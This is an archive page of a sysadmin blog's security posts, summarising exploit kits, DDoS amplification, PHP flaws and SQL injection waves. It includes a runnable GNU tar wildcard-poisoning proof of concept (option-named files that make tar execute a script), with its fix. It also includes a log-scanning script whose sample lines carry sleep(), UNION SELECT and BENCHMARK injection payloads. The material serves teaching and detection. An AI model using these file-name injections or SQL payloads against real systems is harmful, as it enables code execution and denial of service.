Sysadmins of the North

Category Archives for Security

An example of evolving obfuscation

Brad Duncan, security researcher at Rackspace, writes about evolving JavaScript malware obfuscation on the Internet Storm Center (ISC) InfoSec Community Forums.

Angler exploit kit uses domain shadowing technique to evade detection

The Hacker News reports that the infamous Angler exploit kit has become the most advanced, most powerful and best exploit kit available on the market, beating the infamous BlackHole exploit kit, with a host of exploits, including zero-days, and a new technique added to it.

Joomla websites abused as open proxy for Denial-of-Service attacks

Joomla websites using the Googlemaps plugin for Joomla are actively being abused as an open proxy for launching Denial-of-Service (DoS) attacks. Even though the vulnerability in the plugin's plugin_googlemap2_proxy.php was disclosed over one and a half years ago, I still see these DoS attacks happening on a regular basis…

Microsoft warns of PowerPoint OLE 0-day

Security Advisory 3010060 provides additional protections regarding limited, targeted attacks directed at Microsoft Windows customers. An attacker could achieve remote code execution if a user is tricked into opening a maliciously crafted PowerPoint document that contains a malicious Object Linking and Embedding (OLE) object.

SSDP amplified reflective DDoS attacks

SSDP amplified reflective DDoS attacks: The Internet Storm Center (ISC) InfoSec Handlers Diary Blog writes about a recent, significant increase in scanning for 1900/UDP and a huge increase in 1900/UDP being used for amplified reflective DDoS attacks. SSDP lends itself to this because it runs over UDP (the source address of an M-SEARCH request can be spoofed to the victim's) and the responses from exposed UPnP devices are considerably larger than the request: 1900/UDP (SSDP) Scanning and DDOS

Exploit PHP’s mail() to get remote code execution

Exploit PHP’s mail() function to perform remote code execution, under rare circumstances.

phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys

A vulnerability in PHP’s phpinfo() function allows PHP scripts to read arbitrary strings from memory.

Old-school: Unix wildcards gone wild

Back To The Future: Unix Wildcards Gone Wild: DefenseCode's Leon Juranic released an article explaining an old-school hacking technique: Unix wildcard poisoning attacks. The trick is that the shell expands a wildcard such as * into file names before the command runs, so a file named like an option (for example starting with --) is parsed by the tool as an option rather than as a file. No ASLR bypass, ROP exploits or 0-day remote kernel exploits, but if you wonder how basic Unix tools like 'tar', 'chmod' or 'chown' can lead to full system compromise, keep on reading.
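The tar variant of the attack, as an added example that is not from Juranic's paper or from this blog: it assumes GNU tar (the --checkpoint options are GNU-specific) and a POSIX shell, and the "payload" only creates a marker file named pwned in a scratch directory.

```shell
#!/bin/sh
# Added example (not DefenseCode's or this blog's code): tar wildcard poisoning.
# The shell expands '*' to the directory's file names before tar runs, so a
# file named "--checkpoint-action=exec=..." reaches GNU tar as an option.
# Assumes GNU tar and a POSIX shell; shell.sh only creates a marker file.

# Build a scratch directory an unprivileged user could populate (think of a
# world-writable upload or home directory that root later backs up).
make_poisoned_dir() {
    dir=$(mktemp -d)
    printf 'some data\n' > "$dir/notes.txt"
    printf 'touch pwned\n' > "$dir/shell.sh"          # stands in for a real payload
    : > "$dir/--checkpoint=1"                          # fire a checkpoint after every record
    : > "$dir/--checkpoint-action=exec=sh shell.sh"    # ...and run shell.sh at each one
    printf '%s\n' "$dir"
}

# What a naive backup job does. Returns 0 (true) if shell.sh was executed.
unsafe_archive() {
    dir=$1
    rm -f "$dir/pwned"
    ( cd "$dir" && tar cf "$dir.tar" * ) >/dev/null 2>&1 || true
    [ -e "$dir/pwned" ]
}

# The fix: anchor the glob with ./ (or put -- before the file list) so every
# expanded name starts with a path and can never be read as an option.
# Returns 0 (true) if shell.sh was NOT executed.
safe_archive() {
    dir=$1
    rm -f "$dir/pwned"
    ( cd "$dir" && tar cf "$dir.tar" ./* ) >/dev/null 2>&1 || true
    [ ! -e "$dir/pwned" ]
}

cleanup_dir() {
    rm -rf "$1" "$1.tar"
}

demo() {
    d=$(make_poisoned_dir)
    echo "the glob * expands to:"; ( cd "$d" && printf '  %s\n' * )
    if unsafe_archive "$d"; then echo "tar cf x.tar *   -> shell.sh ran (marker file created)"
    else echo "tar cf x.tar *   -> no execution (not GNU tar?)"; fi
    if safe_archive "$d"; then echo "tar cf x.tar ./* -> no execution"; fi
    cleanup_dir "$d"
}
demo
```

The same idea applies to chown and chmod with a crafted --reference=FILE file name, and the same fix applies: never let a bare wildcard be the first thing after the command; use ./* or terminate the option list with --.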

Increase in SQL injection attacks

Summer vacation’s over? More and more SQL injection attacks observed

For a week or so now, I have noticed a huge increase in SQL injection attacks on various websites. Is anyone else seeing the same SQL injection attacks lately? This increased SQL injection activity, across various websites and databases, has the following characteristics:

WordPress 3.9.2 Security Release fixes XML-RPC DoS

WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately. This release fixes a possible denial of service issue in PHP’s XML processing, reported by Nir Goldshlager of the Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress security team and David Rothstein of the Drupal security team. This is the first time our two projects have coordinated on joint security releases.

MySQL sleep() attacks

How to put a MySQL server to sleep()

MySQL sleep() injection attacks: how failing to validate (or parameterize) user input in PHP can lead to Denial of Service (DoS) attacks against websites and back-end database servers. Simply by putting "AND sleep(3)" in the address bar… Every request that carries the payload ties up a database connection and a web server worker for three seconds, so a handful of concurrent requests is enough to exhaust both. Happy SQL injection!
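A small detection script for the two entries above (the SQL injection wave and the sleep() payloads), as an added example that is not this blog's tooling: it URL-decodes the request line of a combined-format access log, flags requests containing sleep()/benchmark() timing payloads and other common injection keywords, and counts hits per source IP. It assumes only POSIX sh and awk; the log lines in write_sample_log are constructed samples, not real traffic.

```shell
#!/bin/sh
# Added example (not this blog's tooling): spot SQL-injection probes, including
# MySQL sleep()/benchmark() timing payloads, in a combined-format access log.
# Assumes POSIX sh and awk only; the log lines below are constructed samples.

# Write a small constructed access log (not real traffic) to the given path.
write_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [08/Sep/2014:10:01:02 +0200] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Sep/2014:10:01:03 +0200] "GET /index.php?id=1%20AND%20sleep(3) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [08/Sep/2014:10:01:09 +0200] "GET /index.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a) HTTP/1.1" 200 512 "-" "-"
198.51.100.9 - - [08/Sep/2014:10:02:11 +0200] "GET /news.php?cat=2%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 500 0 "-" "sqlmap/1.0"
192.0.2.44 - - [08/Sep/2014:10:02:20 +0200] "GET /search.php?q=test%27+AND+BENCHMARK(5000000,MD5(1))--+ HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Sep/2014:10:02:30 +0200] "GET /about.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
}

# Print one line per suspicious request: "<ip>\t<status>\t<decoded request>".
# The request is URL-decoded first so %20/%27/+ encodings cannot hide the
# keywords, then matched case-insensitively.
flag_sqli() {
    awk '
    function urldecode(s,    out, c, h1, h2, hex) {
        hex = "0123456789ABCDEF"; out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                h1 = index(hex, toupper(substr(s, 2, 1))) - 1
                h2 = index(hex, toupper(substr(s, 3, 1))) - 1
                if (h1 >= 0 && h2 >= 0) {
                    out = out sprintf("%c", h1 * 16 + h2); s = substr(s, 4); continue
                }
            }
            if (c == "+") c = " "
            out = out c; s = substr(s, 2)
        }
        return out
    }
    {
        n = split($0, q, "\"")           # q[2] = request line, q[3] = " status bytes "
        if (n < 3) next
        split(q[3], st, " ")
        req = urldecode(q[2])
        low = tolower(req)
        if (low ~ /sleep *\(|benchmark *\(|union +(all +)?select|information_schema|waitfor +delay|load_file *\(/)
            printf "%s\t%s\t%s\n", $1, st[1], req
    }' "$@"
}

# Flagged requests per source IP, busiest first: the list to feed a firewall or fail2ban.
count_sqli_sources() {
    flag_sqli "$@" | cut -f1 | sort | uniq -c | sort -rn
}

# Stand-alone demo on the constructed log; point flag_sqli at a real log to use it.
log=$(mktemp)
write_sample_log "$log"
flag_sqli "$log"
echo "--- flagged requests per source ---"
count_sqli_sources "$log"
rm -f "$log"
```

On the constructed log this flags four requests and puts 203.0.113.7 at the top of the per-source list. Decoding before matching matters: the sleep(3) payload above arrives as id=1%20AND%20sleep(3), and a grep for "AND sleep" on the raw line would miss it.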

OpenPGP Best Practices

Let's continue with the PGP (GnuPG, OpenPGP) and email security/privacy topics. Riseup has put together an OpenPGP Best Practices guide.

SMTP over Hidden Services with postfix

Into.the.Void. writes:
“This post is about sending SMTP traffic between two servers on the Internet over Tor, that is without someone being able to easily see who is sending what to whom. IMHO, it can be helpful in some situations to certain groups of people.”

Be careful with cheap Chinese Android smartphones – Uupay.D trojan pre-installed

Chinese Android smartphones coming pre-installed with the Uupay.D trojan: the cheap Star N9500 Android smartphone ships with the Uupay.D trojan pre-installed, reports AmongTech (via

OpenPGP.js – OpenPGP JavaScript Implementation

OpenPGP.js, the OpenPGP JavaScript Implementation deserves some attention! 🙂
